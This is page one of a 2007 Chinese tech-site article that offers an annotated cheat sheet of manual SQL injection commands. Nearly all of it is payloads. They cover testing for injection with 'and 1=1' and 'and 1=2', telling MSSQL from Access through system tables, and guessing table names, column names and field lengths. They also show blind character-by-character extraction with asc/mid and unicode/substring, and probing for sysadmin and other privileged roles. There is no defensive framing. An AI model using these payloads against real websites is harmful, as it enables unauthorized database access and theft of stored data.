你好,游客 登录 注册 搜索
背景:
阅读新闻

[推荐]带注释手动注入脚本命令小结

[日期:2007-04-24] 来源:Linux公社  作者:Linux [字体: ]
整理了下手动注入脚本命令[带注释]


1.判断是否有注入;and 1=1 ;and 1=2


2.初步判断是否是mssql ;and user>0


3.注入参数是字符’and [查询条件] and ’’=’


4.搜索时没过滤参数的’and [查询条件] and ’%25’=’


5.判断数据库系统

;and (select count(*) from sysobjects)>0 mssql

;and (select count(*) from msysobjects)>0 access


6.猜数据库 ;and (select Count(*) from [数据库名])>0


7.猜字段 ;and (select Count(字段名) from 数据库名)>0


8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0


9.(1)猜字段的ascii值(access)

;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0


(2)猜字段的ascii值(mssql)

;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0


10.测试权限结构(mssql)

;and 1=(select IS_SRVROLEMEMBER(’sysadmin’));--

;and 1=(select IS_SRVROLEMEMBER(’serveradmin’));--

;and 1=(select IS_SRVROLEMEMBER(’setupadmin’));--

;and 1=(select IS_SRVROLEMEMBER(’securityadmin’));--

;and 1=(select IS_SRVROLEMEMBER(’diskadmin’));--

;and 1=(select IS_SRVROLEMEMBER(’bulkadmin’));--

;and 1=(select IS_MEMBER(’db_owner’));--
linux
【内容导航】
第1页:[推荐]带注释手动注入脚本命令小结 第2页:[推荐]带注释手动注入脚本命令小结
第3页:[推荐]带注释手动注入脚本命令小结
本文评论   查看全部评论 (0)
表情: 表情 姓名: 字数

       

评论声明
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
  • 本站管理人员有权保留或删除其管辖留言中的任意内容
  • 本站有权在网站内转载或引用您的评论
  • 参与本评论即表明您已经阅读并接受上述条款